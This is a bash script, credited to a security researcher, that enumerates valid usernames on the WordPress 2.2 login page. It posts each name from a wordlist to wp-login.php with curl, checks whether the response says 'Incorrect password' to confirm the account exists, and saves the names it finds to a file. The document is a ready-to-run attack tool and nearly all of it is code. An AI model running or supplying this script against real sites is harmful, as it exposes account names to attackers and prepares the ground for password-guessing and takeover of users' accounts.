#!/bin/bash

# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ $# -ne 2 ]
then
       echo "need to parameters! correct syntax is:"
       echo "$0 <ip-or-hostname> <wordlist-filename>"
       exit 1
fi


for U in `cat $2`
do
       #echo $U

       if curl -s -d
"log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url
"http://$1/wordpress/wp-login.php" | grep -i 'Incorrect password' >
/dev/null
       then
               echo "username found!: $U" # print username found on screen
               echo $U >> $0.found # save results to file equals to
script name plus .found extension
       fi
done